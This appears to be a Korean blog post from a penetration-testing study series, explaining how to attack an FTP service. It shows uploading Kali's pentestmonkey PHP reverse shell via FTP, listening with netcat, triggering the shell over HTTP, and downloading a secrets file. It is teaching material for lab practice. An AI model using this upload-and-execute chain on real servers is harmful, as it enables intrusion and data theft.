이번에는 FTP 취약점 공격 하는 법을 알아보자.
FTP 취약점 공격
- FTP 접근이 가능한가 - 계정 정보 / 로그인
- 어떤 파일을 업로드/다운로드 할 수 있는가
> 업로드된 파일은 어느 경로에 저장되는가
> 어떤 네트워크 서비스가 업로드 된 파일을 접근하고 실행할 수 있는가
- 악성 파일 업로드
> 리버스 쉘 - /usr/share/webshells/php/php-reverse-shell.php
- 파일 실행 -> FTP가 아닌 다른 서비스
> http://<ip>/php-reverse-shell.php
- 파일 다운로드 및 데이터 추출
> ftp> get secrets.txt
FTP를 이용해서 file upload가 가능
HTTP를 이용해서 file execution (파일 실행)이 가능
FTP를 이용해서 payload를 올리고
HTTP를 이용해서 payload execution을 하는 쪽으로
논리적인 전개가 가능함.
어떤 payload를 업로드할 것인가
payload -> Apache, PHP, webshell // reverse shell
kali에도 기본적으로 존재하는 webshell 들이 있음.
cd /usr/share/webshells/php
ls
편리한 사용을 위해 testing 디렉토리로 copy
cp php-reverse-shell.php ~/testing
cd로 디렉토리 이동
cd ~/testing

파일을 읽어보면 굉장히 유명한 pentestmonkey라는 곳에서 만든 웹 쉘이다. 대략 2005년도에 나온 웹 쉘이라고 한다.

ftp> put php-reverse-shell.php
로 리버스 쉘을 업로드해주고
내 kali에서 nc로 리버스 쉘 커넥팅을 기다린다.
nc -lvnp 1234
그 후, http로 php 리버스 쉘을 실행시키면 커넥팅이 되서
리버스 쉘을 획득할 수 있다.
'해킹 > 호스트 기반 모의해킹' 카테고리의 다른 글
[ 호스트 기반 모의 해킹 ] HTTP 커맨드 인젝션 취약점 공격 (0) | 2024.12.30 |
---|---|
[ 호스트 기반 모의 해킹 ] 문서화 (0) | 2024.12.11 |
[ 호스트 기반 모의 해킹 ] LFI (Local File Inclusion) 공격 (0) | 2024.02.28 |
[ 호스트 기반 모의 해킹 ] 바인드 쉘 제작 (0) | 2024.02.27 |
[ 호스트 기반 모의 해킹 ] 페이로드 개념 (0) | 2024.02.25 |